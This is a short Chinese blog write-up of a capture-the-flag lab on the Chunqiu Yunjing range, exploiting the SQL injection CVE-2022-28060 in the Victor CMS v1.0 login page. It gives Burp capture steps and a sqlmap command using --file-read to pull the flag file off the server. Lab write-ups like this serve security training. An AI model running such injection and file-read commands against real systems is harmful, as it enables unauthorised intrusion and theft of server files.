春秋云镜 CVE-2022-28060

春秋云镜 CVE-2022-28060

靶标介绍:

Victor CMS v1.0 /includes/login.php 存在sql注入

 

 1.打开环境之后进入该路径,看到一个登录界面

 

 2.尝试登录,并使用burp进行抓包

 

 3.将抓包的报文放到一个文件中

 

 4.使用sqlmap进行爆破

?
1
sqlmap -r 1.txt --file-read "/flag" --dbms mysql  

 

 

 

 捕获该地址

?
1
cat /home/wxm/.local/share/sqlmap/output/eci-2zeiq2tg2xj2vwdexjfu.cloudeci1.ichunqiu.com/files/_flag

 

 

 拿到flag

 

posted @   WuliweiT  阅读(165)  评论(0编辑  收藏  举报
相关博文:
·  春秋云境 CVE-2022-28512
·  春秋云镜-CVE-2022-30887
·  春秋云镜靶场 CVE-2022-32991 Web Based Quiz System SQL注入
·  春秋云镜 - CVE-2022-28060
·  【春秋云镜】-sql-CVE-2022-32991
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示
SQL AI 助手